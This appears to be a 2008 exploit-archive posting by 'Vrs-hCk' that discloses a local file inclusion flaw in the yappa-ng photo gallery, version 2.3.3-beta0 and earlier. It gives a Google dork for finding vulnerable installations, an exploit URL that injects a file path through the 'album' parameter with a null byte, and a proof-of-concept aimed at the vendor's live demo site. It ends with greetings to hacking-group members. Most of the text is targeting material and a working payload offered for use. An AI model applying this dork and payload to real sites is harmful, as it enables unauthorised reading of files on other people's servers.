[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : yappa-ng <= 2.3.3-beta0 (album) Local File Inclusion Vulnerability
# Published : 2008-10-19
# Author : Vrs-hCk
# Previous Title : Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability
# Next Title : Vivvo CMS <= 3.4 Multiple Vulnerabilities Destroyer Exploit
[o]------------------------------------------------------------------------------------[x]
| Local File Include Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : yappa-ng Version 2.3.2 |
| Vendor : http://www.zirkon.at/zirkon/scripts/yappa-ng/yappa-ng_main_eng.html |
| Date : 19 October 2008 |
| Author : Vrs-hCk |
| Contact : d00r[at]telkom[dot]net |
[o]------------------------------------------------------------------------------------[o]
[??] Google Dork
"Powered by yappa-ng 2.3.2"
[??] Exploit
http://[site]/[yappa-ng-path]/index.php?album=[LFI]%00
[??] Proof of Concept
http://www.zirkon.at/yappa-ng_demo/index.php?album=[LFI]%00
[o]------------------------------------------------------------------------------------[x]
| Greetz |
[o]------------------------------------------------------------------------------------[o]
| All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org |
| Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, NgL, ScanneD, }^-^{, eminem, |
| loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, dkk ... |
| c0li.m0de.0n & BeHave oR BeGone !!! |
[o]------------------------------------------------------------------------------------[o]
# www.Syue.com [2008-10-19]